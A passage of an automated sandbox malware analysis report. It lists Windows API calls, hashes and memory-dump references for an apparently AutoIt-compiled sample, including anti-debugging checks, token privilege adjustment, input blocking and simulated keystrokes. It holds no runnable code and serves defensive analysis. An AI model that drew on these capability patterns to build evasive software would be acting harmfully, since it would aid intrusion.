                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 234945975-0
                                                                                                                                                                                                              • Opcode ID: 5de9b76879b16f612fe5a1a0c7eb54f0349d391218811a4d5fb70df6bb2117cb
                                                                                                                                                                                                              • Instruction ID: c9815ec0dccc052e2dbf2f0da3198ec00aa1a822f4b0d6767203f85fe8e8e381
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5de9b76879b16f612fe5a1a0c7eb54f0349d391218811a4d5fb70df6bb2117cb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6621AFB1900705EFEB20AF65DC84BAAB7FCEF41324F10441EE646A2191E774EE05EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00F546AC), ref: 00F7E482
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00F7E491
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F7E4A2
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F7E4AE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2695905019-0
                                                                                                                                                                                                              • Opcode ID: ae484f07053bae508bb8ee5792c0fe883056521d5ebbdc0f1face1e7abd45836
                                                                                                                                                                                                              • Instruction ID: 9a933b8a77a838b8c0a097fffc660db80838e6738fe510f68ba490a3af7faad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae484f07053bae508bb8ee5792c0fe883056521d5ebbdc0f1face1e7abd45836
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAF0E57181091457D211AB3CEC0D8AB77ADAE07335B508783F83BC24F0D7789D95B696
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                              • String ID: %.3d$X64
                                                                                                                                                                                                              • API String ID: 481472006-1077770165
                                                                                                                                                                                                              • Opcode ID: 270fca82a4261646f01e8b60a194bbcd6b8e4b4bcc2bc3ffce89b4fed4b85706
                                                                                                                                                                                                              • Instruction ID: a355f0cc6300ca99bd78f0d72b2d08037d18f086ef01118e48d6035d5bffbc06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 270fca82a4261646f01e8b60a194bbcd6b8e4b4bcc2bc3ffce89b4fed4b85706
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7D012BBC1411CE6CB80DA90DC48EB9737CAB19300F248462F90691000E6259908BB22
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F42A8A
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F42A94
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F42AA1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                              • Opcode ID: 3d5e90ee2cb38eff00ce3ea0ac1a2bc6de5344f8edcc2a67bef8264011940681
                                                                                                                                                                                                              • Instruction ID: 1636e6c0ff0909d1a33bf9f89017c95a547e4f1f1e585a0d7f851c1f47da8717
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d5e90ee2cb38eff00ce3ea0ac1a2bc6de5344f8edcc2a67bef8264011940681
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9631D57590122C9BCB61DF68DD897DCBBB8AF08310F5041EAE80CA6260EB349F85DF45
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F309D8
                                                                                                                                                                                                                • Part of subcall function 00F3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F309F5
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7205A
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F72087
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F72097
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 577356006-0
                                                                                                                                                                                                              • Opcode ID: 47d59e8946add294e5d7d44335627b75ce44c5b7f3f6890d64e6699ed07f5f36
                                                                                                                                                                                                              • Instruction ID: f404780cbf040e7c2599fd976de7bd17f97bf724474d83071f5e8a201dd76597
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47d59e8946add294e5d7d44335627b75ce44c5b7f3f6890d64e6699ed07f5f36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C11C1B2400304AFD718AF64DCC6E6BB7B8EB05720F20C41EF04A53251DB70BC41DA20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002,00000000), ref: 00F35079
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002,00000000), ref: 00F35080
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00F35092
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                              • Opcode ID: 398ebdb34fe4161f80e7af2c44374895a8bca75fb77ad15b1c84f9a0031fe272
                                                                                                                                                                                                              • Instruction ID: 0a5fc3a015aff9c2403d1d9f890b00034b4ad799bfb22fa360a14b13d2cc1c8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 398ebdb34fe4161f80e7af2c44374895a8bca75fb77ad15b1c84f9a0031fe272
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73E0B6B140064CAFCF256F54DD09E583B6AEB917A5F114014F84A9A521DB3AED42EAD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F7ED04
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                                                              • String ID: DOWN
                                                                                                                                                                                                              • API String ID: 2434400541-711622031
                                                                                                                                                                                                              • Opcode ID: 5bd65c85fdb3fa90b0c1d3be93f18563baef30f01b450884e258277d646d0af0
                                                                                                                                                                                                              • Instruction ID: e1a058213e6d58d39d081acba613e1a0b3cce21e9a400a0ba0e425247391d127
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bd65c85fdb3fa90b0c1d3be93f18563baef30f01b450884e258277d646d0af0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8E086665AD7257CB90421187C06EF6134C8F16734B1541D7F804E41C0ED546C4270A7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00F6E664
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                                              • String ID: X64
                                                                                                                                                                                                              • API String ID: 2645101109-893830106
                                                                                                                                                                                                              • Opcode ID: a57a12cc5a7a8263cf18b4d430fad6e4557aad3ca6ed705f3e607d1432682cf2
                                                                                                                                                                                                              • Instruction ID: 2d5640425986805fadb019be4bcdef5026cb51cdb61fe40a5e21b025a192ffae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a57a12cc5a7a8263cf18b4d430fad6e4557aad3ca6ed705f3e607d1432682cf2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AD0C9FA81112DEACB80CB90EC88EDA737CBB05304F104651F106A2000D7309548AB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F952EE,?,?,00000035,?), ref: 00F84229
                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F952EE,?,?,00000035,?), ref: 00F84239
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                              • Opcode ID: 21132ed1cab95b1b1e5394a2c9d1010b935e12eef5f1bd634a1df5c69376dd49
                                                                                                                                                                                                              • Instruction ID: 9cfcbc4f64edb15fac18cae9cfaa30b0b107627ee1a115bd74fe93b8c3350058
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21132ed1cab95b1b1e5394a2c9d1010b935e12eef5f1bd634a1df5c69376dd49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0E5716043296AEB2026659C4DFEB366DEFC6761F0002B9F509D2191D970A940E7B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F7BC24
                                                                                                                                                                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F7BC37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InputSendkeybd_event
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3536248340-0
                                                                                                                                                                                                              • Opcode ID: 616847c5f5dfaf380c123fe15abf737823ac77c5b47d76278dc45e581e6df200
                                                                                                                                                                                                              • Instruction ID: df47e2df3de7d0fe7333a7ed5d07c7f6b833206f0c6a432432256dbcb3b10e8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 616847c5f5dfaf380c123fe15abf737823ac77c5b47d76278dc45e581e6df200
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F06D7180024DABDB059FA0C805BFE7BB4FF09309F04C00AF955A6191C7798601EF95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F71B48), ref: 00F71A20
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00F71B48), ref: 00F71A35
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 81990902-0
                                                                                                                                                                                                              • Opcode ID: ad9d09b58a8027d8a06beebe05172ca0f860ba4cda9deb22128664cd09012277
                                                                                                                                                                                                              • Instruction ID: fccdf51988e3f1fa85cd868a9e1dfd344e671b9aa90a4806a3c0d763837243dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9d09b58a8027d8a06beebe05172ca0f860ba4cda9deb22128664cd09012277
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E0BF72014614AFF7252B14FC05F7777A9FB04321F14891EF59680870DB666C91FB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 00F8F51A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                                                              • Opcode ID: 4aec4330daf7ed8b9eaa41fbafa6c6e250e9df9172c2a1101311c3d769fc7934
                                                                                                                                                                                                              • Instruction ID: 2b4931c6a7c0f5c54482c22da4069c158c2b76a58fd1fe02c2611811a09a5618
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4aec4330daf7ed8b9eaa41fbafa6c6e250e9df9172c2a1101311c3d769fc7934
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86E048326102045FC710AF69D804AD6F7D8AFA4761F048425FC4ACB351DA74F9849B91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00F3075E), ref: 00F30D4A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 027669b0ad04fa13c0fcac0bc53edcdd9315cc88a6d38035c1b1c2c28ee7ad64
                                                                                                                                                                                                              • Instruction ID: 56a350b73e4458810801e29d224f509423e47fe1075cc20638500a890754f4e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027669b0ad04fa13c0fcac0bc53edcdd9315cc88a6d38035c1b1c2c28ee7ad64
                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00F9358D
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00F935A0
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00F935AF
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00F935CA
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00F935D1
                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F93700
                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F9370E
                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93755
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00F93761
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F9379D
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937BF
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937D2
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937DD
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00F937E6
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937F5
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F937FE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93805
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00F93810
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93822
                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FB0C04,00000000), ref: 00F93838
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00F93848
                                                                                                                                                                                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F9386E
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F9388D
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F938AF
                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93A9C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
